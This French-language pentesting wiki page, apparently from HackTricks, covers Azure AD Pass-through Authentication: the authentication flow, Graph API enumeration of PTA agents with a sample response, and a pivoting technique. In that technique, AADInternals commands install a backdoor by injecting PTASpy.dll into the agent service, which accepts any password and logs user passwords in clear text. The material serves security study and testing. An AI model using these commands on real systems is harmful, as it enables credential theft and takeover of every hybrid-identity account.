Az - PTA - Pass-through Authentication

Reading time: 5 minutes

Informations de base

Dans la documentation : L'authentification par passage de Microsoft Entra permet à vos utilisateurs de se connecter à la fois aux applications sur site et basées sur le cloud en utilisant les mêmes mots de passe. Cette fonctionnalité offre à vos utilisateurs une meilleure expérience - un mot de passe de moins à retenir, et réduit les coûts du support informatique car vos utilisateurs sont moins susceptibles d'oublier comment se connecter. Lorsque les utilisateurs se connectent en utilisant Microsoft Entra ID, cette fonctionnalité valide les mots de passe des utilisateurs directement contre votre Active Directory sur site.

Dans PTA, les identités sont synchronisées mais les mots de passe ne le sont pas comme dans PHS.

L'authentification est validée dans l'AD sur site et la communication avec le cloud est effectuée par un agent d'authentification fonctionnant sur un serveur sur site (il n'est pas nécessaire qu'il soit sur le DC sur site).

Flux d'authentification

1. Pour se connecter, l'utilisateur est redirigé vers Azure AD, où il envoie le nom d'utilisateur et le mot de passe
2. Les identifiants sont chiffrés et placés dans une file d'attente dans Azure AD
3. L'agent d'authentification sur site récupère les identifiants de la file d'attente et les déchiffre. Cet agent est appelé "agent d'authentification par passage" ou agent PTA.
4. L'agent valide les identifiants contre l'AD sur site et envoie la réponse de retour à Azure AD qui, si la réponse est positive, termine la connexion de l'utilisateur.

Énumération

Depuis Entra ID :

az rest --url 'https://graph.microsoft.com/beta/onPremisesPublishingProfiles/authentication/agentGroups?$expand=agents'
# Example response:
{
"@odata.context": "https://graph.microsoft.com/beta/$metadata#onPremisesPublishingProfiles('authentication')/agentGroups(agents())",
"value": [
{
"agents": [
{
"externalIp": "20.121.45.57",
"id": "4a000eb4-9a02-49e4-b67f-f9b101f8f14c",
"machineName": "ConnectSync.hacktricks-con.azure",
"status": "active",
"supportedPublishingTypes": [
"authentication"
]
}
],
"displayName": "Default group for Pass-through Authentication",
"id": "d372d40f-3f81-4824-8b9e-6028182db58e",
"isDefault": true,
"publishingType": "authentication"
}
]
}

Vérifiez si l'agent s'exécute sur le serveur local :

Get-Service -Name "AzureADConnectAuthenticationAgent"

Pivoting

Si vous avez un accès admin au serveur Azure AD Connect avec l'agent PTA en cours d'exécution, vous pouvez utiliser le module AADInternals pour insérer une porte dérobée qui validera TOUS les mots de passe introduits (donc tous les mots de passe seront valides pour l'authentification) :

Install-Module AADInternals -RequiredVersion 0.9.3
Import-Module AADInternals
Install-AADIntPTASpy # Install the backdoor, it'll save all the passwords in a file
Get-AADIntPTASpyLog -DecodePasswords # Read the file or use this to read the passwords in clear-text

Remove-AADIntPTASpy # Remove the backdoor

Ce backdoor va :

• Créer un dossier caché C:\PTASpy
• Copier un PTASpy.dll dans C:\PTASpy
• Injecter PTASpy.dll dans le processus AzureADConnectAuthenticationAgentService

Seamless SSO

Il est possible d'utiliser Seamless SSO avec PTA, qui est vulnérable à d'autres abus. Vérifiez-le dans :

Az - Seamless SSO

Références

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
• https://aadinternals.com/post/on-prem_admin/#pass-through-authentication